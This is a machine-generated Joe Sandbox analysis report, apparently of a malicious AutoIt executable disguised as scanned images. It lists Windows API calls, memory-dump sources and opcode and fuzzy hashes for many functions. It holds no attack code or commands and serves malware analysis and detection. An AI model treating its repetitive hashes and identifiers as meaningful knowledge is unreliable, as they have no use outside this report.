                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 5b54d88c50b87db8c771731e9bffe55b3375e7ca1a3eed0ffc09a4d922b5381e
                                                        • Instruction ID: d8202cced0d7e0e89f0e39eba5c408a906a0a17127acc672c4c424e3ecfcb4c5
                                                        • Opcode Fuzzy Hash: 5b54d88c50b87db8c771731e9bffe55b3375e7ca1a3eed0ffc09a4d922b5381e
                                                        • Instruction Fuzzy Hash: 1F31AD31244206AFDB259F78DC41BEB77A9EB4A334F204725F875932E0D731E8519B60
                                                        Function 00AA7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AA76D0
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AA76E4
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA7708
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 945e4f82a8a2b50b7635616d650d6ab81bf07d5a38fe055fda1ed3c569245d03
                                                        • Instruction ID: 50024cef2450df98f520a6ffb295dcb60bb681ae80637351c022b51d2f09973e
                                                        • Opcode Fuzzy Hash: 945e4f82a8a2b50b7635616d650d6ab81bf07d5a38fe055fda1ed3c569245d03
                                                        • Instruction Fuzzy Hash: 1521BF32600219BBDF15CFA4CC42FEF3B69EB49724F110214FE156B1D0D7B1A8518BA0
                                                        Function 00AA6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AA6FAA
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AA6FBA
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AA6FDF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 18e91fb84041157d79404837fb7d3244ed5a005080c33e76cfec21bb9040543a
                                                        • Instruction ID: ae9bc9e2cfd19e28fe0109f98b5baf2c6c90938d6652bdd53471cd123a4904c6
                                                        • Opcode Fuzzy Hash: 18e91fb84041157d79404837fb7d3244ed5a005080c33e76cfec21bb9040543a
                                                        • Instruction Fuzzy Hash: 0F218032610118BFDF158F54DC85EAF37AAEF8A764F058128F9159B1D0C771AC528BA0
                                                        Function 00A7912D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A7914F
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A79166
                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00A7919E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: bfb807052a2713066c8899658c625073e38af1184d6dc0474b27fb99d3c3e794
                                                        • Instruction ID: 40362e7377366c1e2d2718b419e60b010e589b84ec8f5b999d4321cf2ff2248a
                                                        • Opcode Fuzzy Hash: bfb807052a2713066c8899658c625073e38af1184d6dc0474b27fb99d3c3e794
                                                        • Instruction Fuzzy Hash: 7521D432600109BFDF60DBA9DC459AFB7BDEF44340F51856BE508E3290DB31AD508B90
                                                        Function 00A960EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00A9613B
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00A9617C
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00A961A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 46938396bce8e158aa2e9e21918a119ff299d1487ccec6c8258e34d0685280c1
                                                        • Instruction ID: ea36f73f7acd2978ca3e59400b02bc9a9ba358172937327a40df83e47c2565c1
                                                        • Opcode Fuzzy Hash: 46938396bce8e158aa2e9e21918a119ff299d1487ccec6c8258e34d0685280c1
                                                        • Instruction Fuzzy Hash: 3D218931300511EFEB00EB68DE85D2AB7E6FF49710B018524F9099B672CB31BC51CB80
                                                        Function 00AA797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AA79E1
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AA79F6
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AA7A03
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: a3f81b79c2720e43d5ed39464630552ac01fdc28cff95a35e19ad96bc9080ad7
                                                        • Instruction ID: f13ffc8277945abaae884b16adeec53990ae6ef6f000cc260d3336174a86d2f8
                                                        • Opcode Fuzzy Hash: a3f81b79c2720e43d5ed39464630552ac01fdc28cff95a35e19ad96bc9080ad7
                                                        • Instruction Fuzzy Hash: 6211C132254248BAEF149F64CC05FAF7BA9EF8A764F020529FA41A70D1D3719811CB60
                                                        Function 00AA6B8F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00AA6C11
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AA6C20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: @U=u$edit
                                                        • API String ID: 2978978980-590756393
                                                        • Opcode ID: 54546cd2c30ec5d8100b0988234ecfbbf7c4d6c2950f75bc64c34bddad295877
                                                        • Instruction ID: f6a129b7a5628dcb2ef012cd76d2ee23af06aafeaf45865a13fe98748ac29319
                                                        • Opcode Fuzzy Hash: 54546cd2c30ec5d8100b0988234ecfbbf7c4d6c2950f75bc64c34bddad295877
                                                        • Instruction Fuzzy Hash: DE118871540208AFEB118FA4DC81AFB3B6AEB163B8F244B24F961D71E0C775DC919B60
                                                        Function 00A792E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A79355
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        • Opcode ID: e125de128df67cf025f95b5ea54494cb187a53e06a9c7b6be803e63fec502c17
                                                        • Instruction ID: 9e5de56a23ddc37a4052c883df5432409cda571670afef70b34688e0ea4d8b04
                                                        • Opcode Fuzzy Hash: e125de128df67cf025f95b5ea54494cb187a53e06a9c7b6be803e63fec502c17
                                                        • Instruction Fuzzy Hash: C801B571A45224ABCB04EBA4DD929FF7769BF06320B14862AF9365B2D1DB31590CC660
                                                        Function 00A791DF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A7924D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        • Opcode ID: 183fdc45eb5ac70750f6ee022ce0bbfd40b151bf999ab3d4b48ff648dfb886ea
                                                        • Instruction ID: 73f777a1f15fd6020cf4502003e60bb8913bf0b07a0d8f5cea044ca3950c0997
                                                        • Opcode Fuzzy Hash: 183fdc45eb5ac70750f6ee022ce0bbfd40b151bf999ab3d4b48ff648dfb886ea
                                                        • Instruction Fuzzy Hash: 44018471A451147BCB04FBA4DE96EFF73A8AF05340F14806AB91667292EB215F0C96B1
                                                        Function 00A79264 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A792D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        • Opcode ID: 25c0ebf04f24e0cd560d9f3ddc35fc1cf48fa7994ac2ac217e22405a71d38159
                                                        • Instruction ID: d4619c3774212ade34a4d148c7f04d8d7b0ac7a2d37fbaf55883db4aaeb782ad
                                                        • Opcode Fuzzy Hash: 25c0ebf04f24e0cd560d9f3ddc35fc1cf48fa7994ac2ac217e22405a71d38159
                                                        • Instruction Fuzzy Hash: F501A771A4521477CF04F7A4DE92EFF77ACAF15340F148126791673282DA215F0C96B1
                                                        Function 00AAAF89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,00AE67B0,00AADB17,000000FC,?,00000000,00000000,?,?,?,00A5BBB9,?,?,?,?,?), ref: 00AAAF8B
                                                        • GetFocus.USER32 ref: 00AAAF93
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • SendMessageW.USER32(0177F430,000000B0,000001BC,000001C0), ref: 00AAB005
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3601265619-2594219639
                                                        • Opcode ID: 072b40e641cd5b0d85712a7524f94a28aa29927bd975a1d0de85ec55cae63815
                                                        • Instruction ID: 28e58d96f828e2015926a235da96f9dee211a1db1a8958ca8f15bab31ff494d5
                                                        • Opcode Fuzzy Hash: 072b40e641cd5b0d85712a7524f94a28aa29927bd975a1d0de85ec55cae63815
                                                        • Instruction Fuzzy Hash: 7C0152312005509FC724DF68D8C4A6777E6EB8A324B180679E4268B2E2CB32AC47CF60
                                                        Function 00A361C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A3619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A361B1
                                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00A361DF
                                                        • GetParent.USER32(?), ref: 00A7111F
                                                        • InvalidateRect.USER32(00000000,?,00A33BAF,?,00000000,00000001), ref: 00A71126
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                                        • String ID: @U=u
                                                        • API String ID: 3648793173-2594219639
                                                        • Opcode ID: 4fb43ebe527ea1d02e831d4b448bfaf0481764abfbb4d867a9e325cbcd94db89
                                                        • Instruction ID: ddc80b270c4d76119abc231472188b5203b2c8856b69b37425bbc64dd2200c18
                                                        • Opcode Fuzzy Hash: 4fb43ebe527ea1d02e831d4b448bfaf0481764abfbb4d867a9e325cbcd94db89
                                                        • Instruction Fuzzy Hash: 68F0A030100244FFEF205FA0DC09FA17BA8AB1A740F24823AF5419F0A2C7A25851AB90
                                                        Function 00A24C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24C2E), ref: 00A24CA3
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A24CB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: cfe65706e92b60c2fbb34bb816f6614b1ebc14be65004d2a14695987c32badf3
                                                        • Instruction ID: d89a2e927a7b975d8337ceb199284545dde6f0177835d14dcfa17260d41024a0
                                                        • Opcode Fuzzy Hash: cfe65706e92b60c2fbb34bb816f6614b1ebc14be65004d2a14695987c32badf3
                                                        • Instruction Fuzzy Hash: AED01770510723DFDB249FBAEA58646B6E6AF0A791B11CC3AD886D6190E770D880CA60
                                                        Function 00A24D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24CE1,?), ref: 00A24DA2
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A24DB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 5291b766313eeb5dca328b9d6cb984b352546af845d3a7faefc688ffd39d3861
                                                        • Instruction ID: 7df9f925662900e4c455e4b6c2292f9c0dc1736bd980682412f674d18ad8dfc7
                                                        • Opcode Fuzzy Hash: 5291b766313eeb5dca328b9d6cb984b352546af845d3a7faefc688ffd39d3861
                                                        • Instruction Fuzzy Hash: A7D01731550723DFEB249FB5E848A8A76E5BF0A355B11CC3AD8C6D6290E770D880CA60
                                                        Function 00A24D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A24D2E,?,00A24F4F,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24D6F
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A24D81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 90376c4660fcdaf963e1dbfac2847992c3b2937e982e336a3374399e931e8542
                                                        • Instruction ID: 76c59dc7c98b0e3ce3461b2807d917784d39a12cecb70ac6b7581e62b008cb2c
                                                        • Opcode Fuzzy Hash: 90376c4660fcdaf963e1dbfac2847992c3b2937e982e336a3374399e931e8542
                                                        • Instruction Fuzzy Hash: BAD01730510723DFDB249FB5E84865676E8BF1A352B11CD3AD487D6290E770D881CA60
                                                        Function 00AA1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00AA12C1), ref: 00AA1080
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AA1092
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 65d796934ed2d8ff1895fea96d0b93bd15781d5c62d430fb844fa6ee91a07144
